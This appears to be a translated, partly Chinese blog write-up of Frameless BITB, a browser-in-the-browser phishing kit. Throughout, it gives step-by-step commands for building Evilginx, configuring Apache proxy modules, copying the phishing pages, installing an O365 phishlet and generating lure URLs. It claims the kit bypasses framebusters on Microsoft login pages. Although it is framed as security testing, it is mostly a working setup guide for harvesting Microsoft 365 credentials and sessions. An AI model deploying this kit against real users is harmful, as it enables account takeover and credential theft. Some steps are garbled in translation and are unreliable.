关于Frameless BITB
Frameless BITB is a powerful BitB (browser within a browser) security testing tool that can help researchers perform BitB security detection on target web applications to improve the security performance of web applications.
The tool does not require the use of iframes and is able to bypass traditional Framebusters technologies, such as the Framebusters implemented by Microsoft on its login pages.
Tool Requirements:
Virtual machine VMs
Go
Evilginx
Apache2
Phishlet
Lure
Tool download & configure
Evilginx configuration
Click https://help.evilginx.com/docs/intro to download and build the latest version of Evilginx.
Then copy the downloaded Evilginx to "/home/evilginx".
Click https://go.dev/doc/install to download and install the latest version of Go locale:
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
Add the following code to the profile file:
source ~/.profile
export PATH=$PATH:/usr/local/go/bin
Check the version installation:
go version
Install make:
sudo apt install make
Construct:
cd /home/evilginx/evilginx2
make
为Evilginx构建代码、phishlets和redirectors:创建一个新目录:
mkdir /home/evilginx/evilginx
拷贝Evilginx构建代码、phishlets和redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
快速修复Ubuntu防火墙:
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
On Ubuntu, if you encounter the "Failed to start nameserver on: :53" error, you can try to modify the following files:
sudo nano /etc/systemd/resolved.conf
编辑/添加DNSStubListener为no > DNSStubListener=no。
Then run the following command:
sudo systemctl restart systemd-resolved
Modify the Evilginx configuration
nano ~/.evilginx/config.json
Revised the https_port from 443 to 8443.
Install Apache2 and enable Mods
Install Apache2:
sudo apt install apache2 -y
启用Apache2 mods:
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
Turn Apache on and on:
sudo systemctl start apache2
sudo systemctl enable apache2
At this point, you can view Apache and VM running by accessing the IP of the VM in a browser.
Frameless BITB下载
Install Git:
sudo apt -y install git
Then use the following command to clone the project source code locally:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Apache custom pages
创建下列三个目录,home保存主页,primary保存登录页面(后台),secondary保存BitB窗口(前端):
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
Copy each page directory:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
Delete the default Apache page:
sudo rm -r /var/www/html/
拷贝O365 Phishlet到phishlets目录:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
tool runs
Install tmux and launch Evilginx in developer mode:
sudo apt install tmux -y
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
Evilginx Configuration:
config domain fake.com
config ipv4 127.0.0.1
It should be noted that setting the Evilginx blacklist mode to NoAdd will cause the Apache blacklist to become invalid, so all Apache traffic will come in:
blacklist noadd
设置Phishlet和Lure:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Open your browser and visit Lure's URL.
Tool use
Tool demo video
Tool introduction: https://www.youtube.com/watch?v=p1opa2wnRvg
Demo: https://youtu.be/luJjxpEwVHI
License Agreement
The development and release of this project is under an open source license.
Project address
Frameless BITB:https://github.com/waelmas/frameless-bitb
Resources
https://janbakker.tech/evilginx-resources-for-microsoft-365/